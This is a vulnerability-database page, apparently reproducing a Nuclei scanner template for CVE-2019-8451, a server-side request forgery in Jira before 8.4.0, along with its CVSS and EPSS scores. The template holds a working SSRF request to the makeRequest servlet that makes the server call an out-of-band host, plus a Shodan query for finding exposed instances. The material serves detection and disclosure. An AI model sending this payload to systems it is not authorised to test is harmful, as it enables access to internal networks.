Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-8451
HistoryJul 06, 2020 - 2:52 p.m.

Jira <8.4.0 - Server-Side Request Forgery

2020-07-0614:52:34
ProjectDiscovery
github.com
7

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.971 High

EPSS

Percentile

99.8%

Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.

id: CVE-2019-8451

info:
  name: Jira <8.4.0 - Server-Side Request Forgery
  author: TechbrunchFR
  severity: medium
  description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: |
    Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability.
  reference:
    - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
    - https://jira.atlassian.com/browse/JRASERVER-69793
    - https://hackerone.com/reports/713900
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8451
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-8451
    cwe-id: CWE-918
    epss-score: 0.97115
    epss-percentile: 0.99766
    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_server
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone

http:
  - method: POST
    path:
      - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'

    body: |
      url=https://{{Host}}:443@{{interactsh-url}}

    headers:
      X-Atlassian-Token: no-check
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http" # Confirms the HTTP Interaction
# digest: 4a0a0047304502210099305059d3e414960b21d2db649914b28ad0864ea5e2e7b28b1d541a8be4f23902200c3ec53bfcedc63c02b6ee1ce23f18159b11efede2353180934369730723fd1f:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.971 High

EPSS

Percentile

99.8%